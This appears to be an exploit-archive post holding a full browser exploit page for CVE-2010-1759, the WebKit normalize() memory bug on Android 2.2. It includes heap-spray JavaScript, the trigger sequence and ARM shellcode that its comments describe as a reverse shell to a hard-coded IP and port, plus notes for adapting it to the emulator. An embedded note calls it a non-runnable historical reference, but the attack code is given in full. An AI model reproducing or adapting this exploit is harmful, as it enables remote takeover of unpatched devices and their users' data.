
Android 2.2 Webkit Normalize

Posted on 02 February 2012

<!-- CVE-2010-1759 webkit normalize bug Tested on Moto Droidx2 running 2.2. Droidx2 running 2.3 is vulnerable but exploit fails due to non-executable heap. Still working on a way around that :) 2.1 - 2.3 emulator. The changes needed are documented in the code. The emulator is less consistent than the real phone Author: MJ Keith mjkeith[at]evilhippie.org -->
<!-- Review note (archival): proof-of-concept for CVE-2010-1759, the WebKit Node.normalize() memory-safety bug, as tested by the author on Android 2.2. Kept as a historical and detection reference only: the affected WebKit code was fixed in later releases, and, as the author notes above, the payload already fails on 2.3 because the heap is non-executable. Defensive takeaways: keep the platform WebView/browser engine patched, and treat a page that sets an attribute, attaches a DOMSubtreeModified listener to that attribute node, forces layout and then calls normalize() while document.write()-ing very large repeated strings as a recognisable signature for this class of exploit. The listing as extracted here has lost its original line breaks (everything after the first '//' on each of the two lines below is now a JavaScript comment), so it is not a runnable reproduction. -->
<p>LOADING... </p> <div id="test1"></div> <div id="test2"></div> <div id="test3"></div> <script> var elem1 = document.getElementById("test1"); var elem2 = document.getElementById("test2"); var elem3 = document.getElementById("test3"); function spray() { for (var i = 0; i < 180000; i++) {var s = new String(unescape("u0052u0052")); } // "u0056u0056" FOR EMULATOR var scode = unescape("u5200u5200"); // "u0058u0058" FOR EMULATOR var scode2 = unescape("u5005ue1a0"); var shell = unescape("u0002ue3a0u1001ue3a0u2005ue281u708cue3a0u708due287u0080uef00u6000ue1a0u1084ue28fu2010ue3a0u708due3a0u708eue287u0080uef00u0006ue1a0u1000ue3a0u703fue3a0u0080uef00u0006ue1a0u1001ue3a0u703fue3a0u0080uef00u0006ue1a0u1002ue3a0u703fue3a0u0080uef00u2001ue28fuff12ue12fu4040u2717udf80ua005ua508u4076u602eu1b6dub420ub401u4669u4052u270budf80u2f2fu732fu7379u6574u2f6du6962u2f6eu6873u2000u2000u2000u2000u2000u2000u2000u2000u2000u2000u0002"); shell += unescape("uae08"); // Port = 2222 shell += unescape("ua8c0u0901"); // IP = 192.168.1.9 // "u000au0202" FOR EMULATOR shell += unescape("u2000u2000"); // Port = 2222 do { scode += scode; scode2 += scode2; } while (scode.length<=0x1000); scode2 += shell target = new Array(); for(i = 0; i < 141; i++){ // CHANGE 141 TO 201 FOR EMULATOR if (i<100){ target[i] = scode;} if (i>100){ target[i] = scode2;} document.write(target[i]); document.write("<br />"); if (i>140){ // CHANGE 140 TO 200 FOR EMULATOR document.write("<br />");} } } function handler1() { elem1.removeAttribute("b"); spray(); } function handler2() { elem2.removeAttribute("b"); spray(); } function handler3() { elem3.removeAttribute("b"); spray(); } 
function slowdown() { for (var i = 0; i < 120; i++) { console.log('slow' + i); if (i > 110 ){ elem1.normalize(); elem2.normalize(); elem3.normalize(); } } } elem1.setAttribute("b", "a"); elem1.attributes[0].appendChild(document.createTextNode("hi")); elem1.attributes[0].addEventListener("DOMSubtreeModified", handler2, false); document.body.offsetTop; slowdown(); // COMMENT OUT THIS FUNCTION CALL FOR EMULATOR //elem1.normalize(); // UN-COMMENT THIS LINE FOR EMULATOR document.body.offsetTop; elem2.setAttribute("b", "a"); elem2.attributes[0].appendChild(document.createTextNode("hi")); elem2.attributes[0].addEventListener("DOMSubtreeModified", handler2, false); document.body.offsetTop; elem2.normalize(); elem3.setAttribute("b", "a"); elem3.attributes[0].appendChild(document.createTextNode("hi")); elem3.attributes[0].addEventListener("DOMSubtreeModified", handler3, false); document.body.offsetTop; elem3.normalize(); </script>

 
